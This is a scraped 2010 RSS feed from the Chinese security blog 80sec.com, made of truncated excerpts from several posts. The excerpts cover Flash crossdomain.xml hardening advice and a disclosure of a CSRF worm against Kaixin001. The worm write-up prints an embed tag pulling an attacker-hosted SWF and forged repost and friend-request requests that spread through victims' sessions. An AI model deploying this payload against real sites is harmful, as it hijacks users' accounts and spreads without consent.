http://www.80sec.com Know it then hack it! Thu, 19 Aug 2010 08:43:01 +0000 http://backend.userland.com/rss092 en http://www.80sec.com/wooyun-%e4%b9%8c%e4%ba%91%e6%ad%a3%e5%bc%8f%e4%b8%8a%e7%ba%bf.html http://www.80sec.com/iis-cgifastcgi-security-hol.html http://www.80sec.com/nginx-securit.html <cross-domain-policy> <allow-access-from domain="*.80sec.com" /> </cross-domain-policy> 其中最主要的策略是allow-access-from表示允许来自哪些域的跨域请求，早期的flash允许从其他位置载入自定义的策略文件，目前最新版的flash在接受自定义的策略文件之前会去检查主目录的crossdomain.xml来判断是否接受自定义策略文件。该选项由 <site-control permitted-cross-domain-policies="by-content-type"/> 节点控制，不加该选项时，默认情况下flash不加载除主策略文件之外的其他策略文件，即只接受根目录里的/crossdomain.xml。这对于防止利用上传文件来定义自己策略文件的攻击非常有效。为了在某些条件下需要启用其他策略文件，我们需要设置permitted-cross-domain-policies，设置为by-content-type时将会只允许http头为text/x-cross-domain-policy的策略文件，当为all时则允许所有的text/xml等格式的策略文件。 应用程序在设计的时候按照最小化原则 1 将文件上传和应用的域名分开，防止通过上传flash文件直接获得域操作的权限。 2 对于不需要使用flash的应用严禁在域名目录下部署flash策略文件。 3 对于有功能需求的应用遵循最小化原则将域名限制到最小的范围，有安全需求的应用应该明确允许跨域请求的域，禁止直接使用*通配符，这将导致跨域访问权限的扩散。 譬如http://sns.80sec.com/crossdomain.xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.80sec.com" /> </cross-domain-policy> 就对权限设置过泛，可能导致其他安全策略的绕过（如绕过csrf等等） 4 对于有高安全需求的应用，在限制域名的前提下，将需要被flash访问的应用限制到指定目录，并且在flash内指定策略文件到该目录以将所有访问权限限制到单一目录。 如果login.80sec.com中的某个功能如login需要对所有域名开放，如果配置根目录crossdomain.xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> 不是一个好的策略因为他不只会开放login同时会开放如chgpassword等其他的服务给用户，我们需要配置主策略文件 <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain-policies="all"/> </cross-domain-policy> 然后自定义策略文件到一个目录如/flash/crossdomain.xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> 并且将login应用部署到/flash/目录，用户的访问将被限制到/flash/下面，无法对其他功能进行操作。 0×02 安全的客户端flash安全规范 控制好flash安全策略并不是安全的全部，这样只能保证服务端的安全。由于一些功能上的原因，譬如为了追求良好的用户体验，为了让无聊的用户可以在页面共享各种flash，为了把页面做得华丽丽的，我们往往需要在页面内容里嵌入flash，这个时候安全性就会被抛到一边（我们还是建议如果不需要的话还是少用这种动态的东西）。我们在一个页面引入一个flash时，一般的做法是下面这种形式： <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" [...]]]> http://www.80sec.com/flash-security-polic.html 开心网直接允许在页面引入其他域的Flash，同时为了安全性，在使用的时候用到了allowscriptaccess属性来做限制。整个代码使用语法分析的方式来做过滤，无法被绕过，但是这里漏掉了一个重要的属性allowNetworking，利用这个属性flash可以通过浏览器做网络访问。 同时开心网另外一个严重的问题就是CSRF问题，尽管其在重要的数据更改的地方都限制只能使用POST方式提交，但是所有的请求数据内容可以被预知，很容易就实现CSRF攻击。而开心网用户之间的交互非常之多，利用一些简单的功能就可以实现将某些内容引诱其他用户访问，CSRF的固有的攻击的被动性可以得到有效的弥补。 综合上面几点，我们就可以利用其中的漏洞主动的攻击开心网在线用户了。 技术实现：80sec之前提供了一款用于Flash渗透测试的工具Fly_Flash，具体地址为http://www.80sec.com/fly_flash-0-1-release.html，利用Fly_Flash我们可以很方便的实现一次渗透测试，譬如在配置文件里写上 3,http://www.80sec.com/action.php?80sec,,,user=data&pass=data 既可以使用浏览器当前的会话像www.kaixin001.com发起一个请求，请求的内容为后面的user=data&pass=data部分，并且整个请求不会受到浏览器的隐私策略的限制，可以同时使用持久Cookie和Session Cookie。 1 发布一个含有测试Flash的帖子，内容包括一些有吸引力的文字和隐藏在文字之间的Flash代码 <embed allowscriptaccess="never" height=384 width=454 src=http://www.80sec.com/fly_flash.swf?sec80=http://www.80sec.com/fly_flash.txt&x.swf wmode="transparent" loop="false" autostart="false"> 2 http://www.80sec.com/fly_flash.txt内容是我们要构造的数据包请求，这里利用开心网的转贴功能实现内容在用户之间的传播 2,http://img.users.51.la/3182000.asp 3,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20569243&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=1 3,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20570931&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=1 3,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20567962&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=1 3,http://www.kaixin001.com/friend/addverify.php?80sec,,,from=&touid=773000&content=hi+%0D%0A%3A%29&rcode=&code=&usercode=&email=&bidirection= 其中2,http://img.users.51.la/3182000.asp用作访问的统计，后面的就是自己构造的对http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php发起的POST请求，后面的数据就是上面我们构造好的邪恶的日记。而一旦用户看了这篇日记之后就会自动进行转贴，一旦其他好友查看之后就会再次自动转贴，蠕虫实现了借助转贴功能的传播。 3 恩，结束，就这么简单。 漏洞修复：我们将在后续对Flash的安全使用问题做深入探讨，这里建议开心网从根本上对CSRF问题做防范，具体方式可以参考80sec以前的文章。 ]]> http://www.80sec.com/flyflash-exploit-kaixin001-co.html ,<url>[,,,data] cmd 0 -- jump URL 1 -- open [...]]]> http://www.80sec.com/fly_flash-0-1-release.html http://www.80sec.com/hacking-web-architecture-for-fun-and-profit.html alert()</script>等过去的时候，我们是无法知道程序的返回结果的，而且一旦程序对输入做了处理，在后台出现乱码等字符时，很容易引起别人的警觉。这个时候我们引入类似于渗透测试中经常使用的扫描的手法，在xss渗透测试时我们可以利用]]> http://www.80sec.com/xss-how-to-root.html http://www.80sec.com/php-pear-mail-package-security-hol.html http://www.80sec.com/php-mail-function-open_basedir-bypass.html